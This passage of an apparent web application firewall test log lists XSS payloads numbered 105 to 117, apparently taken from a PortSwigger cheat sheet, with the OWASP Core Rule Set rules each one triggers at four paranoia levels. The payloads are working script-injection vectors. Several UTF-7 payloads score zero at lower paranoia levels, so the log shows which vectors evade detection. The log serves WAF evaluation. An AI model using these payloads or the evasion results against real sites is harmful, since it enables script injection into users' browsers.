941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 35
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 64
****** payload-105 ********
Payload:
payload=<isindex type=submit action=javascript:alert(1)></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-106 ********
Payload:
payload=<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 48
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 64
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941330 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-107 ********
Payload:
payload=<iframe srcdoc="&amp;lt;img src=1 onerror=alert(1)&amp;gt;"></iframe></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 38
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 51
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 88
****** payload-108 ********
Payload:
payload=<form action="javascript:alert(1)"><input type=submit id=x></form><label for=x>XSS</label></a>
--- Paranoia Level 1 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 43
--- Paranoia Level 3 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 59
--- Paranoia Level 4 ---
941210 PL1 IE XSS Filters - Attack Detected.
941170 PL1 NoScript XSS InjectionChecker: Attribute Injection
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 72
****** payload-109 ********
Payload:
payload=<input type="hidden" accesskey="X" onclick="alert(1)"> (Press ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)</a>
--- Paranoia Level 1 ---
933210 PHP Injection Attack: Variable Function Call Found
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932130 PL1 Remote Command Execution: Unix Shell Expression Found
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
933210 PHP Injection Attack: Variable Function Call Found
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932130 PL1 Remote Command Execution: Unix Shell Expression Found
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 48
--- Paranoia Level 3 ---
933210 PHP Injection Attack: Variable Function Call Found
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932130 PL1 Remote Command Execution: Unix Shell Expression Found
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 64
--- Paranoia Level 4 ---
933210 PHP Injection Attack: Variable Function Call Found
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932130 PL1 Remote Command Execution: Unix Shell Expression Found
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 77
****** payload-110 ********
Payload:
payload=<a href=# download="filename.html">Test</a></a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 25
--- Paranoia Level 3 ---
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 38
--- Paranoia Level 4 ---
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942440 PL2 SQL Comment Sequence Detected.
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 51
****** payload-111 ********
Payload:
payload=<img referrerpolicy="no-referrer" src="//portswigger-labs.net"></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
Total Incoming Score: 5
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
****** payload-112 ********
Payload:
payload=<meta http-equiv="refresh" content="0; url=//portswigger-labs.net"></a>
--- Paranoia Level 1 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
****** payload-113 ********
Payload:
payload=<meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-</a>
--- Paranoia Level 1 ---
921130 PL1 HTTP Response Splitting Attack
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 25
--- Paranoia Level 2 ---
921130 PL1 HTTP Response Splitting Attack
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
921130 PL1 HTTP Response Splitting Attack
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
921130 PL1 HTTP Response Splitting Attack
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
****** payload-114 ********
Payload:
payload=<meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-</a>
--- Paranoia Level 1 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 30
--- Paranoia Level 2 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 53
--- Paranoia Level 3 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 69
--- Paranoia Level 4 ---
921130 PL1 HTTP Response Splitting Attack
941250 PL1 IE XSS Filters - Attack Detected.
941260 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 82
****** payload-115 ********
Payload:
payload=+/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
Total Incoming Score: 0
--- Paranoia Level 3 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 13
--- Paranoia Level 4 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 26
****** payload-116 ********
Payload:
payload=+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
Total Incoming Score: 0
--- Paranoia Level 3 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 13
--- Paranoia Level 4 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 26
****** payload-117 ********
Payload:
payload=+/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
Total Incoming Score: 0
--- Paranoia Level 3 ---
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
